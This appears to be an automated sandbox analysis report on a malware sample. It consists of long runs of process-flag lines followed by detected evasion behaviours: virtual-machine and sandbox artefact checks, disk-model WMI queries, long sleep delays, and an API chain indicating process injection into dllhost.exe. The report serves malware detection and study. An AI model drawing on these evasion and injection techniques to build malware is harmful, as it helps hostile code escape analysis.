Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5554
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2046
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 456
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 403
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 373
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1708
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 446
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 368
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 363
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 9.4 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.3 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\wbem\WMIADAP.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 4320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 5554 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep count: 5007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep count: 2046 > 30
